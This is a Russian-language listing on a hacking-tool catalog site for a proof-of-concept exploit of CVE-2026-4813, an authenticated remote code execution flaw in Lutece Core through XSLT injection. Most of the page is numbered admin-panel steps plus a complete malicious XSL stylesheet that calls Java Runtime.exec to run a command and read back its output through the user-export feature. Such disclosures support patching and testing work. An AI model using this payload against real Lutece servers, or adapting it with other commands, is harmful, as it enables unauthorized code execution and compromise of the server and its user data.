Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-4813 — Эксплойт для проверки концепции удалённого выполнения кода с аутентификацией через XSLT-инъекцию в Lutece Core, демонстрирующий выполнение команд с помощью специально созданных XSL-таблиц стилей. | Kitploit
Инструменты/GitHubGitHub/trachinus/cve-2026-4813
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubtrachinus/cve-2026-4813

CVE-2026-4813

Эксплойт для проверки концепции удалённого выполнения кода с аутентификацией через XSLT-инъекцию в Lutece Core, демонстрирующий выполнение команд с помощью специально созданных XSL-таблиц стилей.

Репозиторий
1 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-4813 (CVSS-B 9.4 КРИТИЧЕСКИЙ)

Аутентифицированное RCE через XSLT-инъекцию в Lutece Core <= 7.1.7

Пояснения и подробнее на моём сайте <

PoC

Вам понадобится учётная запись с правами администратора.

  1. На панели администратора перейдите на страницу управления XSL-экспортом: /jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport

  2. Нажмите «Добавить новый лист преобразования».

  3. Загрузите файл .xsl с полезной нагрузкой (простая команда id):

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
    xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
    xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
    
    <xsl:template match="/">
        <xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
        <xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
        
        <xsl:variable name="reader" select="is:new($inputStream)"/>
        <xsl:variable name="buffereReader" select="br:new($reader)"/>
        <xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
        
        <Output>
            <xsl:value-of select="$resultat"/>
        </Output>
    </xsl:template>
</xsl:stylesheet>
  1. Сохраните новый XSL-лист.

  2. Перейдите на страницу экспорта пользователей: /jsp/admin/user/ExportUsers.jsp

  3. Выберите лист преобразования, который мы только что создали, и подтвердите.

  4. Результат выполнения команды id должен появиться в экспортированном файле.

Скачать инструмент